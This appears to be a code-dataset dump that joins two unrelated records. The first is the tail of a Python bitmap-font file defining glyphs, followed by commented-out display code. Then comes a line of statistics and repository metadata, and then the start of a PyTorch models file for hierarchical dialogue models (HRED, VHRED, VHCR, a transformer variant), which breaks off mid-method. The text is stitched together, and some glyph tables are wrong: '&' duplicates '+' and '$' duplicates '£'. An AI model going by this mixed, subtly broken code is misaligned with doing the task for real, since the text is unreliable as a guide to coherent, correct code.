[0, 0, 0, 1, 1, 1],
[0, 0, 0, 0, 1, 0]]
ten['<'] = [[0, 1, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0],
[0, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 0],
[0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 0],
[1, 1, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0]]
ten['+'] = [[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]]
ten['&'] = [[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]]
ten['-'] = [[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]]
ten['@'] = [[0, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 1, 1, 1, 1],
[1, 1, 0, 1, 0, 1, 1],
[1, 1, 0, 1, 0, 1, 1],
[1, 1, 0, 1, 1, 1, 0],
[1, 1, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 0, 0]]
ten['!'] = [[1, 1],
[1, 1],
[1, 1],
[1, 1],
[1, 1],
[1, 1],
[1, 1],
[0, 0],
[1, 1],
[1, 1]]
ten['?'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 1, 1, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0]]
ten['£'] = [[0, 0, 1, 1, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 0, 0],
[1, 1, 1, 1, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]]
ten['$'] = [[0, 0, 1, 1, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 0, 0],
[1, 1, 1, 1, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]]
ten['%'] = [[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 0],
[1, 1, 1, 0, 0, 0],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1]]
ten['.'] = [[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[1, 1],
[1, 1]]
ten[':'] = [[0, 0],
[0, 0],
[0, 0],
[0, 0],
[1, 1],
[1, 1],
[0, 0],
[0, 0],
[1, 1],
[1, 1]]
ten[','] = [[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[1, 1],
[0, 1]]
ten[';'] = [[0, 0],
[0, 0],
[0, 0],
[0, 0],
[1, 1],
[1, 1],
[0, 0],
[0, 0],
[1, 1],
[0, 1]]
ten['='] = [[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]]
ten['\''] =[[1],
[1],
[1],
[0],
[0],
[0],
[0],
[0],
[0],
[0]]
ten['"'] = [[1, 0, 1],
[1, 0, 1],
[1, 0, 1],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0]]
ten['#'] = [[0, 1, 1, 0, 1, 1, 0],
[0, 1, 1, 0, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 0, 1, 1, 0],
[0, 1, 1, 0, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 0, 1, 1, 0],
[0, 1, 1, 0, 1, 1, 0]]
ten['*'] = [[0, 0, 1, 0, 0],
[0, 1, 1, 1, 0],
[1, 1, 1, 1, 1],
[0, 1, 1, 1, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]]
# import time
# container = list()
# print time.strftime("%H:%M")
# for row in glify('Hey tuesday'.upper() + ' '*13 + str(time.strftime("%H:%M")), five):
# tmp = list()
# for item in row:
# tmp.append(str(int(item)))
# tmp = ''.join(tmp).ljust(96, '0')
# tmp += '\n'
# container.append(''.join(tmp))
# container.append(('0'*96) + '\n')
# for row in glify('Lets Dance!'.upper(), ten):
# tmp = list()
# for item in row:
# tmp.append(str(int(item)))
# tmp = ''.join(tmp).ljust(96, '0')
# tmp += '\n'
# container.append(''.join(tmp))
# while len(container) < 16:
# container.append(('0'*96) + '\n')
# print(container)
# container = ''.join(container)
# container = container.replace('0', '-')
# container = container.replace('1', '#')
| 24.840278 | 87 | 0.192585 | 4,837 | 28,616 | 1.139756 | 0.015092 | 0.67368 | 0.668239 | 0.615273 | 0.940504 | 0.929984 | 0.921277 | 0.908761 | 0.899329 | 0.879557 | 0 | 0.348015 | 0.542214 | 28,616 | 1,151 | 88 | 24.861859 | 0.072672 | 0.027397 | 0 | 0.832311 | 0 | 0.003067 | 0.004749 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14 |
0ffc53dbe372f550439274a74c62c09976d49fe2 | 49,625 | py | Python | model/models.py | text-machine-lab/HierarchicalTransformer | 639e620484f8b6e8b8b87fd9424130aeeaa74f65 | [
"MIT"
] | 7 | 2019-10-24T18:56:24.000Z | 2021-07-04T06:27:34.000Z | model/models.py | text-machine-lab/HierarchicalTransformer | 639e620484f8b6e8b8b87fd9424130aeeaa74f65 | [
"MIT"
] | null | null | null | model/models.py | text-machine-lab/HierarchicalTransformer | 639e620484f8b6e8b8b87fd9424130aeeaa74f65 | [
"MIT"
] | 2 | 2021-03-11T11:04:12.000Z | 2021-03-16T00:48:08.000Z | import torch
import torch.nn as nn
from utils import to_var, pad, normal_kl_div, normal_logpdf, bag_of_words_loss, to_bow, EOS_ID, calc_pos
import layers
import numpy as np
import sys
sys.path.append('..') # ASSUMPTION - THIS MODULE LIES IN DIR NEXT TO TRANSFORMER DIR
import random
from transformer.Models import Transformer, MultiModel, Encoder, GRUEncoder, MultiHeadAttentionGRUDecoder
from transformer.Translator import Translator
from transformer.Models import batched_index_select
from model.utils.vocab import SOS_ID
VariationalModels = ['VHRED', 'VHCR']
def add_sos(x):
sos_id = torch.tensor(SOS_ID).to(x.device).view(1, 1).expand(x.shape[0], -1)
gold = torch.cat([sos_id, x], 1)
return gold
# class TRANSFORMER(nn.Module):
# def __init__(self, config):
# super(TRANSFORMER, self).__init__()
# self.config = config
# self.transformer = Transformer(config.vocab_size, config.vocab_size, config.max_history, config.encoder_hidden_size,
# config.encoder_hidden_size, config.encoder_hidden_size * 4, unet=config.unet,
# tgt_emb_prj_weight_sharing=False)
#
# self.translator = Translator(model=self.transformer, beam_size=config.beam_size, max_seq_len=config.gen_response_len)
#
# def forward(self, histories, segments, responses, decode=False):
# """
# Args:
# histories: (LongTensor) [batch_size, convo_len, seq_len]
# responses: (LongTensor) [batch_size, seq_len]
# Return:
# decoder_outputs: (FloatTensor)
# - train: [batch_size, seq_len, vocab_size]
# - eval: [batch_size, seq_len]
# """
#
# # calculate position vectors to locate each token
# # padding tokens set to zero
#
# # HERE WE ADD GO TOKEN
# responses = add_sos(responses)
#
# history_pos = calc_pos(histories)
# response_pos = calc_pos(responses)
#
# logits = self.transformer(histories, history_pos, responses, response_pos, flat_logits=False, src_segs=segments)
#
# if not decode:
# return logits
# else:
# batch_hyp, batch_logits = self.translator.translate_batch(histories, history_pos, src_segs=segments)
# return batch_hyp
#
# def generate(self, context, sentence_length, n_context):
# raise NotImplementedError('Generate not implemented!')
class MULTI(nn.Module):
def __init__(self, config):
super(MULTI, self).__init__()
self.config = config
#self.encoder = GRUEncoder(config.vocab_size, config.encoder_hidden_size)
# self.encoder = Encoder(
# n_src_vocab=config.vocab_size, len_max_seq=300,
# d_word_vec=config.embedding_size, n_layers=6, n_head=8, d_k=64, d_v=64, d_model=config.encoder_hidden_size,
# d_inner=config.encoder_hidden_size * 4)
#self.decoder = MultiHeadAttentionGRUDecoder(config.vocab_size, config.decoder_hidden_size, dropout=config.dropout)
# self.decoder = layers.DecoderRNN(config.vocab_size,
# config.embedding_size,
# config.decoder_hidden_size,
# config.rnncell,
# config.num_layers,
# config.dropout,
# config.word_drop,
# config.max_unroll,
# config.sample,
# config.temperature,
# config.beam_size)
#
# self.context2decoder = layers.FeedForward(config.context_size,
# config.num_layers * config.decoder_hidden_size,
# num_layers=1,
# activation=config.activation)
#self.tgt_word_prj = nn.Linear(config.decoder_hidden_size, config.vocab_size, bias=False)
# TODO target weight sharing is disabled!
self.model = MultiModel(config.vocab_size, config.vocab_size, config.max_history, config.embedding_size, config.decoder_hidden_size,
config.decoder_hidden_size * 4, encoder=config.encoder_type,
decoder=config.decoder_type, n_layers=config.num_layers, tgt_emb_prj_weight_sharing=False,
per_layer_decoder_attention=config.decoder_per_layer_attention)
self.translator = Translator(model=self.model, beam_size=config.beam_size,
max_seq_len=config.gen_response_len)
# if config.tie_embedding:
# #self.decoder.embedding.weight = self.encoder.src_word_emb.weight
# #self.decoder.out.weight = self.decoder.embedding.weight
#
# self.decoder.embedding.weight = self.encoder.src_word_emb.weight
# #self.tgt_word_prj.weight = self.decoder.tgt_word_emb.weight
# #self.x_logit_scale = (config.decoder_hidden_size ** -0.5)
def forward(self, histories, segments, responses, decode=False):
"""
Args:
input_sentences: (Variable, LongTensor) [num_sentences, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
responses = add_sos(responses)
history_pos = calc_pos(histories)
response_pos = calc_pos(responses)
logits = self.model(histories, history_pos, responses, response_pos, flat_logits=False, src_segs=segments)
if not decode:
return logits
else:
#TODO go back to topk decoding
#batch_hyp = self.translator.sample_topk_batch(histories, history_pos, src_segs=segments)
batch_hyp, batch_scores = self.translator.translate_batch(histories, history_pos, src_segs=segments)
return [sent[0] for sent in batch_hyp] # torch.LongTensor(batch_hyp).squeeze(1)
# history_length = (histories != 0).sum(1) - 1
#
# history_pos = calc_pos(histories)
#
# encoder_outputs, = self.encoder(histories, history_pos, src_segs=segments, return_attns=False)
# #encoder_outputs, = self.encoder(histories)
# encoder_hidden = batched_index_select(encoder_outputs, 1, history_length).unsqueeze(1)
#
# # [num_layers, batch_size, hidden_size]
# decoder_init = encoder_hidden.view(self.config.num_layers, -1, self.config.decoder_hidden_size)
#
# history_pos = calc_pos(histories)
#
# if not decode:
#
# target_sentences = add_sos(target_sentences)[:, :-1]
# #
# # decoder_outputs, = self.decoder(target_sentences, history_pos, histories, decoder_init)
# # seq_logit = self.tgt_word_prj(decoder_outputs)
# #
# # return seq_logit
#
# decoder_outputs = self.decoder(target_sentences,
# init_h=decoder_init,
# decode=decode)
# return decoder_outputs
#
# else:
# prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
#
# return prediction
#
# batch_hyp, batch_logits = self.translator.translate_batch(histories, history_pos, src_segs=segments)
# return batch_hyp
# def generate(self, context, sentence_length, n_context):
#
#
# # TODO allow model to generate?
# raise NotImplementedError('Generate not implemented!')
#
# # context: [batch_size, n_context, seq_len]
# batch_size = context.size(0)
# # n_context = context.size(1)
# samples = []
#
# # Run for context
# context_hidden=None
# for i in range(n_context):
# # encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# # encoder_hidden: [num_layers * direction, batch_size, hidden_size]
# encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
# sentence_length[:, i])
#
# encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
# # context_outputs: [batch_size, 1, context_hidden_size * direction]
# # context_hidden: [num_layers * direction, batch_size, context_hidden_size]
# context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
# context_hidden)
#
# # Run for generation
# for j in range(self.config.n_sample_step):
# # context_outputs: [batch_size, context_hidden_size * direction]
# context_outputs = context_outputs.squeeze(1)
# decoder_init = self.context2decoder(context_outputs)
# decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
#
# prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# # prediction: [batch_size, seq_len]
# prediction = prediction[:, 0, :]
# # length: [batch_size]
# length = [l[0] for l in length]
# length = to_var(torch.LongTensor(length))
# samples.append(prediction)
#
# encoder_outputs, encoder_hidden = self.encoder(prediction,
# length)
#
# encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
#
# context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
# context_hidden)
#
# samples = torch.stack(samples, 1)
# return samples
class HRED(nn.Module):
def __init__(self, config):
super(HRED, self).__init__()
self.config = config
self.encoder = layers.EncoderRNN(config.vocab_size,
config.embedding_size,
config.encoder_hidden_size,
config.rnn,
1,
config.bidirectional,
config.dropout)
context_input_size = (1
* config.encoder_hidden_size
* self.encoder.num_directions)
self.context_encoder = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
1,
config.dropout)
self.decoder = layers.DecoderRNN(config.vocab_size,
config.embedding_size,
config.decoder_hidden_size,
config.rnncell,
1,
config.dropout,
config.word_drop,
config.max_unroll,
config.sample,
config.temperature,
config.beam_size)
self.context2decoder = layers.FeedForward(config.context_size,
config.decoder_hidden_size,
num_layers=1,
activation=config.activation)
if config.tie_embedding:
self.decoder.embedding = self.encoder.embedding
def forward(self, input_sentences, input_sentence_length,
input_conversation_length, target_sentences, decode=False):
"""
Args:
input_sentences: (Variable, LongTensor) [num_sentences, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
num_sentences = input_sentences.size(0)
max_len = input_conversation_length.data.max().item()
# encoder_outputs: [num_sentences, max_source_length, hidden_size * direction]
# encoder_hidden: [num_layers * direction, num_sentences, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(input_sentences,
input_sentence_length)
# encoder_hidden: [num_sentences, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(num_sentences, -1)
# pad and pack encoder_hidden
start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
input_conversation_length[:-1])), 0)
# encoder_hidden: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden = torch.stack([pad(encoder_hidden.narrow(0, s, l), max_len)
for s, l in zip(start.data.tolist(),
input_conversation_length.data.tolist())], 0)
# context_outputs: [batch_size, max_len, context_size]
context_outputs, context_last_hidden = self.context_encoder(encoder_hidden,
input_conversation_length)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
# project context_outputs to decoder init state
decoder_init = self.context2decoder(context_outputs)
# [num_layers, batch_size, hidden_size]
decoder_init = decoder_init.view(1, -1, self.decoder.hidden_size)
# train: [batch_size, seq_len, vocab_size]
# eval: [batch_size, seq_len]
if not decode:
decoder_outputs = self.decoder(target_sentences,
init_h=decoder_init,
decode=decode)
return decoder_outputs
else:
# decoder_outputs = self.decoder(target_sentences,
# init_h=decoder_init,
# decode=decode)
# return decoder_outputs.unsqueeze(1)
# prediction: [batch_size, beam_size, max_unroll]
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# Get top prediction only
# [batch_size, max_unroll]
# prediction = prediction[:, 0]
# [batch_size, beam_size, max_unroll]
return prediction
def generate(self, context, sentence_length, n_context):
# context: [batch_size, n_context, seq_len]
batch_size = context.size(0)
# n_context = context.size(1)
samples = []
# Run for context
context_hidden=None
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
# context_outputs: [batch_size, 1, context_hidden_size * direction]
# context_hidden: [num_layers * direction, batch_size, context_hidden_size]
context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
context_hidden)
# Run for generation
for j in range(self.config.n_sample_step):
# context_outputs: [batch_size, context_hidden_size * direction]
context_outputs = context_outputs.squeeze(1)
decoder_init = self.context2decoder(context_outputs)
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# prediction: [batch_size, seq_len]
prediction = prediction[:, 0, :]
# length: [batch_size]
length = [l[0] for l in length]
length = to_var(torch.LongTensor(length))
samples.append(prediction)
encoder_outputs, encoder_hidden = self.encoder(prediction,
length)
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
context_hidden)
samples = torch.stack(samples, 1)
return samples
class VHRED(nn.Module):
def __init__(self, config):
super(VHRED, self).__init__()
self.config = config
self.encoder = layers.EncoderRNN(config.vocab_size,
config.embedding_size,
config.encoder_hidden_size,
config.rnn,
config.num_layers,
config.bidirectional,
config.dropout)
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions)
self.context_encoder = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout)
self.decoder = layers.DecoderRNN(config.vocab_size,
config.embedding_size,
config.decoder_hidden_size,
config.rnncell,
config.num_layers,
config.dropout,
config.word_drop,
config.max_unroll,
config.sample,
config.temperature,
config.beam_size)
self.context2decoder = layers.FeedForward(config.context_size + config.z_sent_size,
config.num_layers * config.decoder_hidden_size,
num_layers=1,
activation=config.activation)
self.softplus = nn.Softplus()
self.prior_h = layers.FeedForward(config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.prior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.prior_var = nn.Linear(config.context_size,
config.z_sent_size)
self.posterior_h = layers.FeedForward(config.encoder_hidden_size * self.encoder.num_directions * config.num_layers + config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.posterior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.posterior_var = nn.Linear(config.context_size,
config.z_sent_size)
if config.tie_embedding:
self.decoder.embedding = self.encoder.embedding
if config.bow:
self.bow_h = layers.FeedForward(config.z_sent_size,
config.decoder_hidden_size,
num_layers=1,
hidden_size=config.decoder_hidden_size,
activation=config.activation)
self.bow_predict = nn.Linear(config.decoder_hidden_size, config.vocab_size)
def prior(self, context_outputs):
# Context dependent prior
h_prior = self.prior_h(context_outputs)
mu_prior = self.prior_mu(h_prior)
var_prior = self.softplus(self.prior_var(h_prior))
return mu_prior, var_prior
def posterior(self, context_outputs, encoder_hidden):
h_posterior = self.posterior_h(torch.cat([context_outputs, encoder_hidden], 1))
mu_posterior = self.posterior_mu(h_posterior)
var_posterior = self.softplus(self.posterior_var(h_posterior))
return mu_posterior, var_posterior
def compute_bow_loss(self, target_conversations):
target_bow = np.stack([to_bow(sent, self.config.vocab_size) for conv in target_conversations for sent in conv], axis=0)
target_bow = to_var(torch.FloatTensor(target_bow))
bow_logits = self.bow_predict(self.bow_h(self.z_sent))
bow_loss = bag_of_words_loss(bow_logits, target_bow)
return bow_loss
def forward(self, sentences, sentence_length,
input_conversation_length, target_sentences, decode=False):
"""
Args:
sentences: (Variable, LongTensor) [num_sentences + batch_size, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
batch_size = input_conversation_length.size(0)
num_sentences = sentences.size(0) - batch_size
max_len = input_conversation_length.data.max().item()
# encoder_outputs: [num_sentences + batch_size, max_source_length, hidden_size]
# encoder_hidden: [num_layers * direction, num_sentences + batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(sentences,
sentence_length)
# encoder_hidden: [num_sentences + batch_size, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(
1, 0).contiguous().view(num_sentences + batch_size, -1)
# pad and pack encoder_hidden
start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
input_conversation_length[:-1] + 1)), 0)
# encoder_hidden: [batch_size, max_len + 1, num_layers * direction * hidden_size]
encoder_hidden = torch.stack([pad(encoder_hidden.narrow(0, s, l + 1), max_len + 1)
for s, l in zip(start.data.tolist(),
input_conversation_length.data.tolist())], 0)
# encoder_hidden_inference: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_inference = encoder_hidden[:, 1:, :]
encoder_hidden_inference_flat = torch.cat(
[encoder_hidden_inference[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
# encoder_hidden_input: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_input = encoder_hidden[:, :-1, :]
# context_outputs: [batch_size, max_len, context_size]
context_outputs, context_last_hidden = self.context_encoder(encoder_hidden_input,
input_conversation_length)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
mu_prior, var_prior = self.prior(context_outputs)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
if not decode:
mu_posterior, var_posterior = self.posterior(
context_outputs, encoder_hidden_inference_flat)
z_sent = mu_posterior + torch.sqrt(var_posterior) * eps
log_q_zx = normal_logpdf(z_sent, mu_posterior, var_posterior).sum()
log_p_z = normal_logpdf(z_sent, mu_prior, var_prior).sum()
# kl_div: [num_sentneces]
kl_div = normal_kl_div(mu_posterior, var_posterior,
mu_prior, var_prior)
kl_div = torch.sum(kl_div)
else:
z_sent = mu_prior + torch.sqrt(var_prior) * eps
kl_div = None
log_p_z = normal_logpdf(z_sent, mu_prior, var_prior).sum()
log_q_zx = None
self.z_sent = z_sent
latent_context = torch.cat([context_outputs, z_sent], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(-1,
self.decoder.num_layers,
self.decoder.hidden_size)
decoder_init = decoder_init.transpose(1, 0).contiguous()
# train: [batch_size, seq_len, vocab_size]
# eval: [batch_size, seq_len]
if not decode:
decoder_outputs = self.decoder(target_sentences,
init_h=decoder_init,
decode=decode)
return decoder_outputs, kl_div, log_p_z, log_q_zx
else:
# prediction: [batch_size, beam_size, max_unroll]
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
return prediction, kl_div, log_p_z, log_q_zx
def generate(self, context, sentence_length, n_context):
# context: [batch_size, n_context, seq_len]
batch_size = context.size(0)
# n_context = context.size(1)
samples = []
# Run for context
context_hidden=None
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
# context_outputs: [batch_size, 1, context_hidden_size * direction]
# context_hidden: [num_layers * direction, batch_size, context_hidden_size]
context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
context_hidden)
# Run for generation
for j in range(self.config.n_sample_step):
# context_outputs: [batch_size, context_hidden_size * direction]
context_outputs = context_outputs.squeeze(1)
mu_prior, var_prior = self.prior(context_outputs)
eps = to_var(torch.randn((batch_size, self.config.z_sent_size)))
z_sent = mu_prior + torch.sqrt(var_prior) * eps
latent_context = torch.cat([context_outputs, z_sent], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
if self.config.sample:
prediction = self.decoder(None, decoder_init)
p = prediction.data.cpu().numpy()
length = torch.from_numpy(np.where(p == EOS_ID)[1])
else:
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# prediction: [batch_size, seq_len]
prediction = prediction[:, 0, :]
# length: [batch_size]
length = [l[0] for l in length]
length = to_var(torch.LongTensor(length))
samples.append(prediction)
encoder_outputs, encoder_hidden = self.encoder(prediction,
length)
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
context_hidden)
samples = torch.stack(samples, 1)
return samples
class VHCR(nn.Module):
def __init__(self, config):
super(VHCR, self).__init__()
self.config = config
self.encoder = layers.EncoderRNN(config.vocab_size,
config.embedding_size,
config.encoder_hidden_size,
config.rnn,
config.num_layers,
config.bidirectional,
config.dropout)
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions + config.z_conv_size)
self.context_encoder = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout)
self.unk_sent = nn.Parameter(torch.randn(context_input_size - config.z_conv_size))
self.z_conv2context = layers.FeedForward(config.z_conv_size,
config.num_layers * config.context_size,
num_layers=1,
activation=config.activation)
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions)
self.context_inference = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout,
bidirectional=True)
self.decoder = layers.DecoderRNN(config.vocab_size,
config.embedding_size,
config.decoder_hidden_size,
config.rnncell,
config.num_layers,
config.dropout,
config.word_drop,
config.max_unroll,
config.sample,
config.temperature,
config.beam_size)
self.context2decoder = layers.FeedForward(config.context_size + config.z_sent_size + config.z_conv_size,
config.num_layers * config.decoder_hidden_size,
num_layers=1,
activation=config.activation)
self.softplus = nn.Softplus()
self.conv_posterior_h = layers.FeedForward(config.num_layers * self.context_inference.num_directions * config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.conv_posterior_mu = nn.Linear(config.context_size,
config.z_conv_size)
self.conv_posterior_var = nn.Linear(config.context_size,
config.z_conv_size)
self.sent_prior_h = layers.FeedForward(config.context_size + config.z_conv_size,
config.context_size,
num_layers=1,
hidden_size=config.z_sent_size,
activation=config.activation)
self.sent_prior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_prior_var = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_posterior_h = layers.FeedForward(config.z_conv_size + config.encoder_hidden_size * self.encoder.num_directions * config.num_layers + config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.sent_posterior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_posterior_var = nn.Linear(config.context_size,
config.z_sent_size)
if config.tie_embedding:
self.decoder.embedding = self.encoder.embedding
def conv_prior(self):
# Standard gaussian prior
return to_var(torch.FloatTensor([0.0])), to_var(torch.FloatTensor([1.0]))
def conv_posterior(self, context_inference_hidden):
h_posterior = self.conv_posterior_h(context_inference_hidden)
mu_posterior = self.conv_posterior_mu(h_posterior)
var_posterior = self.softplus(self.conv_posterior_var(h_posterior))
return mu_posterior, var_posterior
def sent_prior(self, context_outputs, z_conv):
# Context dependent prior
h_prior = self.sent_prior_h(torch.cat([context_outputs, z_conv], dim=1))
mu_prior = self.sent_prior_mu(h_prior)
var_prior = self.softplus(self.sent_prior_var(h_prior))
return mu_prior, var_prior
def sent_posterior(self, context_outputs, encoder_hidden, z_conv):
h_posterior = self.sent_posterior_h(torch.cat([context_outputs, encoder_hidden, z_conv], 1))
mu_posterior = self.sent_posterior_mu(h_posterior)
